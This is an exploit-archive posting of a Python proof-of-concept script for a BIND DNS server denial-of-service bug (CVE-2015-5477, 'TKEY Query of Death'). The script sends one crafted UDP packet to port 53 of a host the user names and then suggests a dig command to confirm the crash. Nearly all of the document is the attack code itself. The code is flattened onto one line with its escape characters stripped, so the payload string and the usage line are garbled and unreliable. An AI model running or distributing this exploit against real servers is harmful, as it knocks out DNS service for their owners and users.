BIND TKEY Query Denial Of Service
Posted on 04 August 2015
#!/usr/bin/python # Title: BIND Remote DoS via TKEY queries # aka: DNS TKEY Query of Death # Author: Lorenzo Corsini <serdat> # E-Mail: serdat5[at]gmail[dot]com # Twitter: https://twitter.com/serdat5tm # References: # https://kb.isc.org/article/AA-01272 # https://www.isc.org/blogs/about-cve-2015-5477-an-error-in-handling-tkey-queries-can-cause-named-to-exit-with-a-require-assertion-failure/ # Warning there is no way to use this PoC in a non-desruptive manner. # Use with care. I'm not responsible for what you'll do with that import socket import sys #Not randomized. DNS_PACKET='x04Xx00x80x00x01x00x01x00x00x00x01x03xxxx00x00xf9x00xffx03xxxx00x00xf9x00xffx00x00x00x00x00%x03xxxx00x00x00x00x00x00x00x00x00x00x03x00x00x00x10x10x10x10x10x10x10x10x10x10x10x10x10x10x10x10x10x00x00x03xxxx00x00x10x00xffx00x00x00x00x00%$aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' try: HOST=sys.argv[1] PORT= 53 except: print "Usage: %s host_to_crash" & sys.argv[0] sys.exit(-1) print "Exploiting target at %s" % HOST s=socket.socket(socket.AF_INET,socket.SOCK_DGRAM) s.sendto(DNS_PACKET,(HOST,PORT)) s.close() print "Check Manually if the exploit worked... try launching:" print "dig @%s CR4SH3D any" % HOST
